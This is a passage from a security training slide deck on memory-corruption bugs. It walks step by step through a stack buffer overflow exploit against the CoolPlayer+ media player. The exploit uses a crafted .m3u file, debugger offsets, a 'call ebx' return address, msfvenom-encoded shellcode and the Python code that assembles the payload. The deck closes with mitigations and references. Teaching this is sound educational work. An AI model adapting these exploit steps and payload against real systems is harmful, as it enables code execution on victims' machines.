Slide 166
Slide 166 text
Stack Overflow
DEMO 3: EXPLOITATION
Let’s try a
quick test
• Press CTRL+O
to open a file
• Select the m3u
file we just
created with our
Python script
• You’ll get this
window
Interesting!
Slide 167
Slide 167 text
Stack Overflow
DEMO 3: EXPLOITATION
Go to menu File,
select Attach
Run again
Slide 168
Slide 168 text
Stack Overflow
DEMO 3: EXPLOITATION Go to menu
Debug, select
Arguments
Keep exploit files
on root folder
RESTART:
CTRL+F2
Slide 169
Slide 169 text
Stack Overflow
DEMO 3: EXPLOITATION
• On Immunity Debugger
• After changing the argument to point to the exploit file
(coolplayer_try.m3u), press CTRL+F2 to restart
• Press F9 (RUN) twice
• Wait a few seconds, less than a minute
• You will see the registers and memory stack as shown on next slide
Slide 170
Slide 170 text
Stack Overflow
DEMO 3: EXPLOITATION
MEMORY
STACK
• EDX points to the beginning of the
string
• EBX also points to the beginning of
the string but contains a much
longer portion of it
• EIP is the Exception Offset shown
3 slides ago. ESP is next
Addresses
will probably
be different
Slide 171
Slide 171 text
Stack Overflow
DEMO 3: EXPLOITATION
• Find the pattern offset
• How many characters does it take to reach that address (EIP)?
• Using Metasploit
• Run /usr/share/metasploit-framework/tools/
pattern_offset.rb
Slide 172
Slide 172 text
Stack Overflow
DEMO 3: EXPLOITATION
• What do we have so far?
• It takes 260 chars to get to EIP (offset)
• EIP takes 4 bytes (or 4 chars)
• Could hold one instruction, or two
• If I could call EBX I could access the beginning of the string
• Must be an executable address to “call EBX”
• I have plenty of space in this string to store my code, after EIP
• Before EIP I have only 260 bytes!
Slide 173
Slide 173 text
Stack Overflow
DEMO 3: EXPLOITATION
Goal: run
shellcode
Stack
(lower addresses)
NOPs
SHELLCODE
NOPs
(higher addresses)
EBP
ESP
MOVE EBX TO A
POINT AFTER EIP
JUMP TO EBX
(fill with junk
until EIP)
EIP CALL EBX
260 bytes
}
EBX
Points to the
beginning of
the string
Slide 174
Slide 174 text
Stack Overflow
DEMO 3: EXPLOITATION
• Find a CALL EBX
• Run !mona find -type instr -s "call ebx"
Address
0x7522eb9a
from
kernel32.dll was
chosen from
find.txt
Logs:
ALT+L
Slide 175
Slide 175 text
Stack Overflow
DEMO 3: EXPLOITATION
• Increase EBX to get past EIP
• Run /usr/share/metasploit-framework/tools/metasm_shell.rb
Cannot contain 00
Will interrupt processing
Could “add 100” 3 times
Metasm converts
Assembly
instructions into
opcodes
header = "\x83\xc3\x64" * 3 #(100 * 3 = 300)
Slide 176
Slide 176 text
Stack Overflow
DEMO 3: EXPLOITATION
• After increasing EBX, we will use an instruction to jump to
this new address
• Fill the buffer with junk until EIP
• junk = "\x41" * (260 - len(header)) #0x41 = “A”
• Insert into EIP the instruction that will take us to the beginning
• eip = little_endian(0x7522eb9a) #call ebx
• After EIP, insert some NOPs to give it a little room
• nops = "\x90" * 100
header += "\xff\xe3"
Slide 177
Slide 177 text
Stack Overflow
DEMO 3: EXPLOITATION
Goal: run
shellcode
Stack
(lower addresses)
NOPs
SHELLCODE
NOPs
(higher addresses)
EBP
ESP
ADD EBX, 100
ADD EBX, 100
ADD EBX, 100
JMP EBX
(fill with junk
until EIP)
EIP CALL EBX
260 bytes
}
EBX
EBX
300 bytes
offset
Slide 178
Slide 178 text
Stack Overflow
DEMO 3: EXPLOITATION
BEGIN OF FILE
#!/usr/bin/python
import struct
def little_endian(address):
return struct.pack("
Slide 179
Slide 179 text
Stack Overflow
DEMO 3: EXPLOITATION
SHELLCODE
• To generate the shellcode that will open calc.exe
• Run msfvenom -a x86 --platform windows -p windows/exec
CMD=calc.exe -b ‘\x00\x0a\x0d\xff’ -e x86/shikata_ga_nai -f
python
• The shellcode (buf) will be reformatted on next slide
Slide 180
Slide 180 text
Stack Overflow
DEMO 3: EXPLOITATION
MIDDLE OF FILE
shell = (
"\xb8\x4d\x25\x9c\x45\xdb\xcf\xd9\x74\x24\xf4\x5a\x29"
"\xc9\xb1\x31\x31\x42\x13\x83\xea\xfc\x03\x42\x42\xc7"
"\x69\xb9\xb4\x85\x92\x42\x44\xea\x1b\xa7\x75\x2a\x7f"
"\xa3\x25\x9a\x0b\xe1\xc9\x51\x59\x12\x5a\x17\x76\x15"
"\xeb\x92\xa0\x18\xec\x8f\x91\x3b\x6e\xd2\xc5\x9b\x4f"
"\x1d\x18\xdd\x88\x40\xd1\x8f\x41\x0e\x44\x20\xe6\x5a"
"\x55\xcb\xb4\x4b\xdd\x28\x0c\x6d\xcc\xfe\x07\x34\xce"
"\x01\xc4\x4c\x47\x1a\x09\x68\x11\x91\xf9\x06\xa0\x73"
"\x30\xe6\x0f\xba\xfd\x15\x51\xfa\x39\xc6\x24\xf2\x3a"
"\x7b\x3f\xc1\x41\xa7\xca\xd2\xe1\x2c\x6c\x3f\x10\xe0"
"\xeb\xb4\x1e\x4d\x7f\x92\x02\x50\xac\xa8\x3e\xd9\x53"
"\x7f\xb7\x99\x77\x5b\x9c\x7a\x19\xfa\x78\x2c\x26\x1c"
"\x23\x91\x82\x56\xc9\xc6\xbe\x34\x87\x19\x4c\x43\xe5"
"\x1a\x4e\x4c\x59\x73\x7f\xc7\x36\x04\x80\x02\x73\xfa"
"\xca\x0f\xd5\x93\x92\xc5\x64\xfe\x24\x30\xaa\x07\xa7"
"\xb1\x52\xfc\xb7\xb3\x57\xb8\x7f\x2f\x25\xd1\x15\x4f"
"\x9a\xd2\x3f\x2c\x7d\x41\xa3\x9d\x18\xe1\x46\xe2")
Slide 181
Slide 181 text
Stack Overflow
DEMO 3: EXPLOITATION
END OF FILE
exploit = junk + eip + nops + shell
footer = "\x90" * (buffer - len(exploit))
f=open(file,"w")
f.write(header + exploit + footer)
f.close()
Write to file
Concatenates
the variables
Fills the rest of
the buffer
Slide 182
Slide 182 text
Stack Overflow
DEMO 3: EXPLOITATION Go to menu
Debug, select
Arguments
Keep exploit files on root
folder
Slide 183
Slide 183 text
Stack Overflow
DEMO 3: EXPLOITATION
• On Immunity Debugger
• After changing the argument to point to the exploit file
(coolplayer_exploit.m3u), press CTRL+F2 to restart
• Press F9 (RUN) twice
• Wait a few seconds, less than a minute
• Calc.exe should be executed
• Memory stack will show
• NOPs
• Shellcode
• On command prompt
• Run Coolplayer+.exe
• Open coolplayer_exploit.m3u
• Calc.exe will open, Coolplayer will close
MEMORY
STACK
Slide 184
Slide 184 text
Stack Overflow
DEMO 3: EXPLOITATION
• Because payload (shellcode) has only 220 bytes, it would
fit before EIP
• Let’s try another version of the exploit
• Insert shellcode at the beginning, before EIP
• Fill the buffer with NOPs until EIP
• nops = "\x90" * (260 – len(shell)) #offset eip
• Insert into EIP the instruction that will take us to the beginning
• eip = little_endian(0x7522eb9a) #call ebx
• Change the order of variable exploit
• exploit = shell + nops + eip
• footer = "\x90" * (buffer - len(exploit))
Solution #2
Slide 185
Slide 185 text
Stack Overflow
DEMO 3: EXPLOITATION
Goal: run
shellcode
Stack
(lower addresses)
NOPs
(higher addresses)
EBP
ESP
SHELLCODE
(fill with NOPs
until EIP)
.
.
.
.
.
EIP CALL EBX
260 bytes
}
EBX
Solution #2
Slide 186
Slide 186 text
Buffer Overflow
• Integer Overflow
• Stack Overflow
• Format String
• Demo 0: program crash / view stack
• Off-by-one Overflow
AGENDA
Slide 187
Slide 187 text
Format String
• The Format Family
INTRODUCTION
function action
fprintf Prints to a FILE stream
printf Prints to the stdout stream
sprintf Prints into a string
snprintf Prints to a string with length checking
vfprintf Prints to a FILE stream from a va_arg structure
vprintf Prints to stdout from a va_arg structure
vsprintf Prints to a string from a va_arg structure
vsnprintf Prints to a string with length checking from a va_arg structure
Slide 188
Slide 188 text
Format String
• The Format String
INTRODUCTION
parameter output passed as
%d decimal (int) value
%u unsigned decimal (unsigned int) value
%x hexadecimal (unsigned int) value
%s string ((const) (unsigned) char *) reference
%n number of bytes written so far, (* int) reference
Slide 189
Slide 189 text
Format String
INTRODUCTION
ESP
ESP+4
ESP+8
ESP+C
MEMORY STACK
CPU
INSTRUCTIONS
ESP+18
MOV
LEA
FROM
memoryUninitialized.exe
RET
EBP
Slide 190
Slide 190 text
Format String
INTRODUCTION
DOUBLE
CLICK
TIP: TO FIND THE DISTANCE FROM HIGHLIGHTED ROW
Slide 191
Slide 191 text
Buffer Overflow
• Integer Overflow
• Stack Overflow
• Format String
• Demo 0: program crash / view stack
• Off-by-one Overflow
AGENDA
Slide 192
Slide 192 text
Format String
DEMO 0: EXPLOITATION
• An attacker may try to crash a daemon to observe sensitive
information on its crashing output
Slide 193
Slide 193 text
Format String
DEMO 0: EXPLOITATION
Slide 194
Slide 194 text
Format String
DEMO 0: EXPLOITATION
Slide 195
Slide 195 text
Format String
DEMO 0: EXPLOITATION
Slide 196
Slide 196 text
Format String
DEMO 0: SOLUTION
Slide 197
Slide 197 text
Format String
DEMO 0: SOLUTION
Slide 198
Slide 198 text
Buffer Overflow
• Integer Overflow
• Stack Overflow
• Format String
• Off-by-one Overflow
AGENDA
Slide 199
Slide 199 text
Off-by-one Overflow
EXPLOITATION
Slide 200
Slide 200 text
Off-by-one Overflow
EXPLOITATION
Slide 201
Slide 201 text
Off-by-one Overflow
EXPLOITATION
DEBUGGER: CPU INSTRUCTIONS
Slide 202
Slide 202 text
Off-by-one Overflow
EXPLOITATION
DEBUGGER: MEMORY STACK
ESP
MEMORY STACK
EBP
RET
EBP-C
EBP-10
EBP-18
EBP+8
ESP+4
ESP+8
auth
i
argv
buffer
Slide 203
Slide 203 text
Off-by-one Overflow
EXPLOITATION
DEBUGGER: MEMORY STACK
Slide 204
Slide 204 text
Off-by-one Overflow
SOLUTION
Slide 205
Slide 205 text
Off-by-one Overflow
SOLUTION
Slide 206
Slide 206 text
Agenda
Introduction
Vulnerabilities
• Memory Leak
• Memory Uninitialized
• Buffer Over-read
• Buffer Underflow
• Buffer Overflow
Summary
Slide 207
Slide 207 text
Summary
• Dr. Memory (Free, open source software)
• http://www.drmemory.org/
• Windows, Linux or Mac
• Their words: Dr. Memory is a memory monitoring tool capable of
identifying memory-related programming errors such as accesses
of uninitialized memory and accesses to unaddressable memory
• Visual Code Grepper (Free, open source software)
• sourceforge.net/projects/visualcodegrepp
• Windows
• Their words: VCG is an automated code security review tool for
C++, C#, VB, PHP, Java and PL/SQL which is intended to
drastically speed up the code review process by identifying bad/
insecure code.
WITH A LITTLE HELP FROM MY FRIENDS
Slide 208
Slide 208 text
Summary
• Dr. Memory (memoryLeak.exe)
• Error #1: LEAK 8000 direct bytes 0x00d41d10-0x00d43c50 + 0 indirect bytes
• # 0 replace_malloc [d:\drmemory_package\common\alloc_replace.c:2384]
• # 1 wasteMemory
• # 2 main
• Dr. Memory (memoryUninitialized.exe)
• Error #2: LEAK 4 direct bytes 0x00cd1e08-0x00cd1e0c + 0 indirect bytes
• # 0 replace_malloc [d:\drmemory_package\common\alloc_replace.c:2384]
• # 1 main
WITH A LITTLE HELP FROM MY FRIENDS
Slide 209
Slide 209 text
Summary
WITH A LITTLE HELP FROM MY FRIENDS
Slide 210
Slide 210 text
Summary
• Stack analysis of source code to find overflows
• Black-box testing with long strings
• Modern compilers and languages implement security
controls to avoid these vulnerabilities
• GCC: -fstack-protector, –fstack-protector
• Linux: sudo echo 1 > /proc/sys/kernel/randomize_va_space
• Use a Canary as an insurance policy
• Security by design: design from the ground up to be
secure. Start thinking about security since phase 1
HOW TO PROCEED
Slide 211
Slide 211 text
References
• Tutorials
• Security Sift
• http://www.securitysift.com/windows-exploit-development-part-1-basics/
• FuzzySecurity
• http://www.fuzzysecurity.com/tutorials/expDev/1.html
• Corelan
• https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-
part-1-stack-based-overflows/
LOOKING FOR MORE?
Slide 212
Slide 212 text
References
• Tools
• Immunity Debugger
• http://www.immunityinc.com/products/debugger/
• Mona.py
• https://github.com/corelan/mona
• Metasploit
• http://www.metasploit.com/
• Exploits (to study BOs)
• Exploit-DB
• https://www.exploit-db.com/
LOOKING FOR MORE?